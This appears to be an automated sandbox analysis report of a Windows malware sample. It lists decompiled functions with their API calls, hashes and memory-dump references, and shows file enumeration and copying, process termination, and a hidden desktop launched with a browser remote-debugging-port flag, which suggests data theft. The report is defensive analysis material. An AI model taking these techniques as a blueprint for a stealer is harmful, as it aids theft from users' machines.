                                • lstrcpy.KERNEL32(00000000,?), ref: 00C816F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81745
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C817BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C817F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8181C
                                • FindClose.KERNEL32(00000000), ref: 00C8182B
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 7e91a6f723438b2e51bfd3d6547b712cf8251ba26d1609de59d636bee7d91b93
                                • Instruction ID: 4841de83e8ef04c6a15d217645bf940283635f46cdf84d9bae04a6e1421b3b23
                                • Opcode Fuzzy Hash: 7e91a6f723438b2e51bfd3d6547b712cf8251ba26d1609de59d636bee7d91b93
                                • Instruction Fuzzy Hash: 1D1252716112069FCB24EF79D889AAF77F8EF44304F098528BC5AE3251DB34ED468B94
                                Function 00C8CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C8CBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8CC13
                                • lstrcat.KERNEL32(?,?), ref: 00C8CC5F
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8CC71
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8CC8B
                                • wsprintfA.USER32 ref: 00C8CCB0
                                • PathMatchSpecA.SHLWAPI(?,01798A18), ref: 00C8CCE2
                                • CoInitialize.OLE32(00000000), ref: 00C8CCEE
                                  • Part of subcall function 00C8CAE0: CoCreateInstance.COMBASE(00C9B110,00000000,00000001,00C9B100,?), ref: 00C8CB06
                                  • Part of subcall function 00C8CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00C8CB46
                                  • Part of subcall function 00C8CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00C8CBC9
                                • CoUninitialize.COMBASE ref: 00C8CD09
                                • lstrcat.KERNEL32(?,?), ref: 00C8CD2E
                                • lstrlen.KERNEL32(?), ref: 00C8CD3B
                                • StrCmpCA.SHLWAPI(?,00C9CFEC), ref: 00C8CD55
                                • wsprintfA.USER32 ref: 00C8CD7D
                                • wsprintfA.USER32 ref: 00C8CD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00C8CDB0
                                • wsprintfA.USER32 ref: 00C8CDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C8CDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8CE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00C8CE28
                                • CloseHandle.KERNEL32(00000000), ref: 00C8CE33
                                • CloseHandle.KERNEL32(00000000), ref: 00C8CE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C8CE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8CE94
                                • FindNextFileA.KERNEL32(?,?), ref: 00C8CF8D
                                • FindClose.KERNEL32(?), ref: 00C8CF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: dabc8ba2dc6f5b2103ff3c445042ff28ebeddae1a5a7c5cb3b7655d6637351d7
                                • Instruction ID: 50dc942a1878ebf1d5ba8908dcf73a43f85a487a7ec8669a62c0764600bdd2aa
                                • Opcode Fuzzy Hash: dabc8ba2dc6f5b2103ff3c445042ff28ebeddae1a5a7c5cb3b7655d6637351d7
                                • Instruction Fuzzy Hash: 7EC18475A002199FDB64EF64DC85AEE77B9FF89304F0485A9F519A7180EA30AB44CF60
                                Function 00C81269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C81291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C812BF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C812CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812E7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C812F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C8133A
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8135C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C81376
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C813AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C813D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C813E2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C813ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8140A
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81416
                                • lstrlen.KERNEL32(?), ref: 00C81423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81443
                                • lstrcat.KERNEL32(00000000,?), ref: 00C81451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8147A
                                • StrCmpCA.SHLWAPI(?,0179D8F8), ref: 00C814A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C814E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81535
                                • StrCmpCA.SHLWAPI(?,0179DD50), ref: 00C81552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C815BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C815E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C817BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C817F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8181C
                                • FindClose.KERNEL32(00000000), ref: 00C8182B
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 88078b9e641ff9c2993e22957ae99fe02cb5e1416431afe9b35833ec8569e0e4
                                • Instruction ID: bc5477ef6e8b55cafbeba2ac9226027dafe28dc32ce3c8dbbb45b105d8e7e888
                                • Opcode Fuzzy Hash: 88078b9e641ff9c2993e22957ae99fe02cb5e1416431afe9b35833ec8569e0e4
                                • Instruction Fuzzy Hash: 06C17331A112069FCB21FF69DC89AAE77F8EF45314F098028BC5AE3151DB34ED069B90
                                Function 00C79770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00C79790
                                • lstrcat.KERNEL32(?,?), ref: 00C797A0
                                • lstrcat.KERNEL32(?,?), ref: 00C797B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00C797C3
                                • memset.MSVCRT ref: 00C797D7
                                  • Part of subcall function 00C93E70: lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C93EA5
                                  • Part of subcall function 00C93E70: lstrcpy.KERNEL32(00000000,0179E248), ref: 00C93ECF
                                  • Part of subcall function 00C93E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00C7134E,?,0000001A), ref: 00C93ED9
                                • wsprintfA.USER32 ref: 00C79806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00C79827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00C79844
                                  • Part of subcall function 00C946A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C946B9
                                  • Part of subcall function 00C946A0: Process32First.KERNEL32(00000000,00000128), ref: 00C946C9
                                  • Part of subcall function 00C946A0: Process32Next.KERNEL32(00000000,00000128), ref: 00C946DB
                                  • Part of subcall function 00C946A0: StrCmpCA.SHLWAPI(?,?), ref: 00C946ED
                                  • Part of subcall function 00C946A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C94702
                                  • Part of subcall function 00C946A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C94711
                                  • Part of subcall function 00C946A0: CloseHandle.KERNEL32(00000000), ref: 00C94718
                                  • Part of subcall function 00C946A0: Process32Next.KERNEL32(00000000,00000128), ref: 00C94726
                                  • Part of subcall function 00C946A0: CloseHandle.KERNEL32(00000000), ref: 00C94731
                                • lstrcat.KERNEL32(00000000,?), ref: 00C79878
                                • lstrcat.KERNEL32(00000000,?), ref: 00C79889
                                • lstrcat.KERNEL32(00000000,00CA4B60), ref: 00C7989B
                                • memset.MSVCRT ref: 00C798AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00C798D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C79903
                                • StrStrA.SHLWAPI(00000000,0179EF30), ref: 00C79919
                                • lstrcpyn.KERNEL32(00EA93D0,00000000,00000000), ref: 00C79938
                                • lstrlen.KERNEL32(?), ref: 00C7994B
                                • wsprintfA.USER32 ref: 00C7995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00C79971
                                • Sleep.KERNEL32(00001388), ref: 00C799E7
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C792E1
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C792FA
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C79399
                                  • Part of subcall function 00C792B0: strlen.MSVCRT ref: 00C793E6
                                  • Part of subcall function 00C94740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00C94759
                                  • Part of subcall function 00C94740: Process32First.KERNEL32(00000000,00000128), ref: 00C94769
                                  • Part of subcall function 00C94740: Process32Next.KERNEL32(00000000,00000128), ref: 00C9477B
                                  • Part of subcall function 00C94740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9479C
                                  • Part of subcall function 00C94740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C947AB
                                  • Part of subcall function 00C94740: CloseHandle.KERNEL32(00000000), ref: 00C947B2
                                  • Part of subcall function 00C94740: Process32Next.KERNEL32(00000000,00000128), ref: 00C947C0
                                  • Part of subcall function 00C94740: CloseHandle.KERNEL32(00000000), ref: 00C947CB
                                • CloseDesktop.USER32(?), ref: 00C79A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 75bbe77509695ff58b728b05cea574e58c98848e4aee83b85925b871a9343fd2
                                • Instruction ID: 2cbeb5a1ea1682d43c5a5ea5b68463383f46045a3dc088f4d5b297b05f235035
                                • Opcode Fuzzy Hash: 75bbe77509695ff58b728b05cea574e58c98848e4aee83b85925b871a9343fd2
                                • Instruction Fuzzy Hash: 49916471A50208AFDB10DFB4DC89FDE77B8EF49700F1485A5F60DA7191DB70AA489BA0
                                Function 00C8E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C8E22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8E243
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8E263
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8E27D
                                • wsprintfA.USER32 ref: 00C8E2A2
                                • StrCmpCA.SHLWAPI(?,00C9CFEC), ref: 00C8E2B4
                                • wsprintfA.USER32 ref: 00C8E2D1
                                  • Part of subcall function 00C8EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00C8EE12
                                • wsprintfA.USER32 ref: 00C8E2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00C8E304
                                • lstrcat.KERNEL32(?,0179F488), ref: 00C8E335
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8E347
                                • lstrcat.KERNEL32(?,?), ref: 00C8E358
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8E36A
                                • lstrcat.KERNEL32(?,?), ref: 00C8E37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C8E394
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E422
                                • DeleteFileA.KERNEL32(?), ref: 00C8E45C
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8E49B
                                • FindClose.KERNEL32(00000000), ref: 00C8E4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 26abda5fe6dee024bd915bee1e62cb9c1d6b22a290f57cf3435c9b011848b638
                                • Instruction ID: 25d436c2f04a2cafaf6ab38ad3a53d8a70e328d7e427dae90c88fbd27d283db9
                                • Opcode Fuzzy Hash: 26abda5fe6dee024bd915bee1e62cb9c1d6b22a290f57cf3435c9b011848b638
                                • Instruction Fuzzy Hash: DB81647190021D9FCB24EFA5DD49AEE77B9FF89304F0485A8B51AA3151DB34AA48CF90
                                Function 00C716B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C716E2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7176C
                                • lstrcat.KERNEL32(00000000), ref: 00C71776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C717A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C718F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C718FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: 107d6f45505f3c6eaf0ae573b9ea36a13ded3cbeb33ccf7e36aaf3ea221ae359
                                • Instruction ID: 78b3d8625618d76bd4a176c40379cd098357b55f3847d07ffba73ff48429d448
                                • Opcode Fuzzy Hash: 107d6f45505f3c6eaf0ae573b9ea36a13ded3cbeb33ccf7e36aaf3ea221ae359
                                • Instruction Fuzzy Hash: 6F815E3191121A9FCB21EFA8D889AAE77F4EF55310F09C124FD1DA7252DB30AE05DB91
                                Function 00C8DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C8DD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C8DD4C
                                • wsprintfA.USER32 ref: 00C8DD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8DD79
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8DD9C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8DDB6
                                • wsprintfA.USER32 ref: 00C8DDD4
                                • DeleteFileA.KERNEL32(?), ref: 00C8DE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C8DDED
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                  • Part of subcall function 00C8D980: memset.MSVCRT ref: 00C8D9A1
                                  • Part of subcall function 00C8D980: memset.MSVCRT ref: 00C8D9B3
                                  • Part of subcall function 00C8D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8D9DB
                                  • Part of subcall function 00C8D980: lstrcpy.KERNEL32(00000000,?), ref: 00C8DA0E
                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,00000000), ref: 00C8DA1C
                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,0179ECF0), ref: 00C8DA36
                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,?), ref: 00C8DA4A
